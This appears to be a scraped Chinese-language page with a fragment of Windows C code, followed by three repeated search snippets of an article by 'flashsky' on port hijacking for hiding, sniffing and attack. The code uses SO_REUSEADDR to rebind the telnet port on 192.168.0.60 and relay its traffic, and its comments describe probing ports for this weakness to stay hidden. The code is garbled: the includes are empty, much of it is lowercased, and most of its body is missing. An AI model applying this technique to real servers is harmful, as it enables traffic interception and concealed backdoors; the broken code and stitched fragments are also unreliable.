#include
#include
#include
dword winapi clientthread(lpvoid lpparam); int main() saddr.sin_family = af_inet; //截聽雖然也可以將位址指定為inaddr_any,但是要不能影響正常應用情況下,應該指定具體的ip,留下127.0.0.1給正常的服務應用,然後利用這個位址進行**,就可以不影響對方正常應用了 saddr.sin_addr.s_addr = inet_addr("192.168.0.60"); saddr.sin_port = htons(23); if((s=socket(af_inet,sock_stream,ipproto_tcp))==socket_error) val = true; //so_reuseaddr選項就是可以實現埠重繫結的 if(setsockopt(s,sol_socket,so_reuseaddr,(char *)&val,sizeof(val))!=0) //如果指定了so_exclusiveaddruse,就不會繫結成功,返回無許可權的錯誤**; //如果是想通過重利用埠達到隱藏的目的,就可以動態的測試當前已繫結的埠哪個可以成功,就說明具備這個漏洞,然後動態利用埠使得更隱蔽 //其實udp埠一樣可以這樣重繫結利用,這兒主要是以telnet服務為例子進行攻擊 if(bind(s,(sockaddr *)&saddr,sizeof(saddr))==socket_error) listen(s,2); while(1) } closehandle(mt); } closesocket(s); wsacleanup(); return 0; } dword winapi clientthread(lpvoid lpparam) val = 100; if(setsockopt(sc,sol_socket,so_rcvtimeo,(char *)&val,sizeof(val))!=0) if(setsockopt(ss,sol_socket,so_rcvtimeo,(char *)&val,sizeof(val))!=0) if(connect(sc,(sockaddr *)&saddr,sizeof(saddr))!=0) while(1) closesocket(ss); closesocket(sc); return 0 ; }
埠截聽實現埠隱藏,嗅探與攻擊
flashsky flashsky1 at sina.email flashsky xfocus.站點 xfocus.shopsky.在windows的socket伺服器應用的程式設計中,如下的語句或許比比都是 s socket af i sock stream,ipproto tcp saddr....
埠截聽實現埠隱藏,嗅探與攻擊
原作者姓名 flashsky 正文在windows的socket伺服器應用的程式設計中,如下的語句或許比比都是 s socket af inet,sock stream,ipproto tcp saddr.sin family af inet saddr.sin addr.s addr htonl ...
埠截聽實現埠隱藏,嗅探與攻擊
埠截聽實現埠隱藏,嗅探與攻擊 在windows的socket伺服器應用的程式設計中,如下的語句或許比比都是 s socket af inet,sock stream,ipproto tcp saddr.sin family af inet saddr.sin addr.s addr htonl in...